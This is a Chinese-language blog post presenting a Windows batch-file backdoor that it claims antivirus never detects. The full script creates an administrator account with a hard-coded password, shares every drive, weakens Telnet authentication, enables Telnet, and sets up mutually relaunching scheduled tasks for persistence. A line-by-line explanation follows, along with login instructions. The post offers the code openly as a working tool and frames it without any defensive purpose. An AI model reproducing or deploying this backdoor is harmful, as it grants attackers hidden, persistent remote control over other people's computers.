写一个永不被查杀批处理后门—windows计划任务的妙用

  • A+
所属分类:[开发技巧]

代码是在邪八论坛上看到的,作者是xyt。刚看到这个批处理时是有几处有些糊涂,后来也懂了。邪八上拿过来的源代码有好几处BUG,我都修改了,简单测试了下没有问题。这个批处理的功能到底是不强的,但思路非常好,有兴趣的朋友可以自行修改。一般来说,这种批处理后门是永远不被查杀的。
源代码如下:
程序代码
@echo off
@attrib +s +r hqw.bat
@net user hqw hack520org /add
@net localgroup administrators hqw /add
@sc config lanmanserver start= auto
@net start server
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@sc config Schedule start= auto
@net stop "Task Scheduler"
@net start "Task Scheduler"
@echo at 11:00 %systemroot%\SYSTEM32\log.bat > %systemroot%\SYSTEM32\hqw.bat
@echo at 23:00 %systemroot%\SYSTEM32\log.bat >> %systemroot%\SYSTEM32\hqw.bat
@at 11:05 %systemroot%\SYSTEM32\hqw.bat
@at 23:05 %systemroot%\SYSTEM32\hqw.bat
@sc config tlntsvr start= auto
@net stop telnet
@net start telnet
@exit

这样就会循环运行我们的程序了,即使被人停下来,过几个小时(时间可以自己改)会自动重新运行,呵呵~~
运行后TELNET IP上去,用户名为hqw,密码为hack520org。

解释一下这个批处理的核心代码:
引用内容
把以上的批处理保存为log.bat运行后他自动生成
hqw.bat
其中
hqw.bat的内容为
at 11:00 %systemroot%\system32\log.bat
at 23:00 %systemroot%\system32\log.bat

@echo at 11:00 %systemroot%\SYSTEM32\log.bat > %systemroot%\SYSTEM32\hqw.bat
@echo at 23:00 %systemroot%\SYSTEM32\log.bat >> %systemroot%\SYSTEM32\hqw.bat

这个意思是
把at 11:00 %systemroot%\SYSTEM32\log.bat 写进%systemroot%\SYSTEM32\hqw.bat 文件..如果没有就自动创建
第二个
@echo at 23:00 %systemroot%\SYSTEM32\log.bat >> %systemroot%\SYSTEM32\hqw.bat
同理..不过因为第一句已经创建了..所以第二个直接添加at 23:00 %systemroot%\SYSTEM32\log.bat这里注意一定要是>>如果是>的话回直接覆盖那个hqw.bat文件

hqw.bat的作用是在特定的时间执行
log.bat的..其中log.bat执行后...又自动创建并覆盖hqw.bat
他两个就好比是在互相监视的
但如果log.bat被删除了话..这个批处理后门就没啥用了

如果你把这个批出来的文件名改为hqw.bat为不是log.bat运行后你会发现hqw.bat的内容由原来的换成了
at 11:00 %systemroot%\system32\log.bat
所以一定要把文件名改为log.bat这样才会成功

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin
广告也精彩
avatar
广告也精彩

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: